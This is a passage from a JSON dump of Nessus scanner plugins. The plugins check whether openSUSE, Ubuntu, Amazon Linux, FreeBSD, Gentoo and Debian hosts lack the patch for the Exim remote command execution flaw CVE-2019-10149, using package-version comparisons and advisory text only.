or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"exim-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"exim-debuginfo-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"exim-debugsource-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"eximon-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"eximon-debuginfo-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"eximstats-html-4.88-lp151.4.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-10T00:06:41", "description": "It was discovered that Exim incorrectly handled certain 
decoding\noperations. A remote attacker could possibly use this issue to execute\narbitrary commands.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "Ubuntu 18.04 LTS / 18.10 : exim4 vulnerability (USN-4010-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light"], "id": "UBUNTU_USN-4010-1.NASL", "href": "https://www.tenable.com/plugins/nessus/125770", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4010-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125770);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"USN\", value:\"4010-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 18.10 : exim4 vulnerability (USN-4010-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that Exim incorrectly handled certain decoding\noperations. A remote attacker could possibly use this issue to execute\narbitrary commands.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4010-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected exim4-daemon-heavy and / or exim4-daemon-light\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2021 Canonical, Inc. / NASL script (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! 
preg(pattern:\"^(18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.90.1-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.90.1-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.91-6ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.91-6ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4-daemon-heavy / exim4-daemon-light\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-09T17:25:53", "description": "A flaw was found in Exim versions 4.87 to 4.91 before release 1.20\n(inclusive). Improper validation of recipient address in\ndeliver_message() function in /src/deliver.c may lead to remote\ncommand execution. 
(CVE-2019-10149)", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "Amazon Linux AMI : exim (ALAS-2019-1221)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1221.NASL", "href": "https://www.tenable.com/plugins/nessus/125739", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1221.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125739);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"ALAS\", value:\"2019-1221\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2019-1221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A flaw was found in Exim versions 4.87 to 4.91 before release 1.20\n(inclusive). Improper validation of recipient address in\ndeliver_message() function in /src/deliver.c may lead to remote\ncommand execution. 
(CVE-2019-10149)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1221.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.91-1.20.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-09T18:59:10", "description": "Exim team and Qualys report :\n\nWe received a report of a possible remote exploit. Currently there is\nno evidence of an active use of this exploit.\n\nA patch exists already, is being tested, and backported to all\nversions we released since (and including) 4.87.\n\nThe severity depends on your configuration. It depends on how close to\nthe standard configuration your Exim runtime configuration is. The\ncloser the better.\n\nExim 4.92 is not vulnerable.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "FreeBSD : Exim -- RCE in deliver_message() function (45bea6b5-8855-11e9-8d41-97657151f8c2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim"], "id": "FREEBSD_PKG_45BEA6B5885511E98D4197657151F8C2.NASL", "href": "https://www.tenable.com/plugins/nessus/125749", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125749);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_name(english:\"FreeBSD : Exim -- RCE in deliver_message() function (45bea6b5-8855-11e9-8d41-97657151f8c2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Exim team and Qualys report :\n\nWe received a report of a possible remote exploit. 
Currently there is\nno evidence of an active use of this exploit.\n\nA patch exists already, is being tested, and backported to all\nversions we released since (and including) 4.87.\n\nThe severity depends on your configuration. It depends on how close to\nthe standard configuration your Exim runtime configuration is. The\ncloser the better.\n\nExim 4.92 is not vulnerable.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.exim.org/static/doc/security/CVE-2019-10149.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/45bea6b5-8855-11e9-8d41-97657151f8c2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?48eb73b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/27\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>=4.87<4.92\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-09T19:22:06", "description": "The remote host is affected by the vulnerability described in GLSA-201906-01\n(Exim: Remote command execution)\n\n A vulnerability was discovered in how Exim validates recipient addresses\n in the deliver_message() function.\n \nImpact :\n\n A remote attacker could execute arbitrary commands by sending an email\n with a specially crafted recipient address to the affected system.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", 
"title": "GLSA-201906-01 : Exim: Remote command execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:exim"], "id": "GENTOO_GLSA-201906-01.NASL", "href": "https://www.tenable.com/plugins/nessus/125751", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201906-01.\n#\n# The advisory text is Copyright (C) 2001-2021 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125751);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"GLSA\", value:\"201906-01\");\n\n script_name(english:\"GLSA-201906-01 : Exim: Remote command execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201906-01\n(Exim: Remote command execution)\n\n A vulnerability was discovered in how Exim validates recipient addresses\n in the deliver_message() function.\n \nImpact :\n\n A remote attacker could execute arbitrary commands by sending an email\n with a specially crafted recipient address to the affected system.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201906-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Exim 
users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.92'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.92\"), vulnerable:make_list(\"lt 4.92\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-20T10:01:11", "description": "The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "Debian DSA-4456-1 : exim4 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4456.NASL", "href": "https://www.tenable.com/plugins/nessus/125742", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4456. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125742);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"DSA\", value:\"4456\");\n\n script_name(english:\"Debian DSA-4456-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4456\"\n );\n script_set_attribute(\n 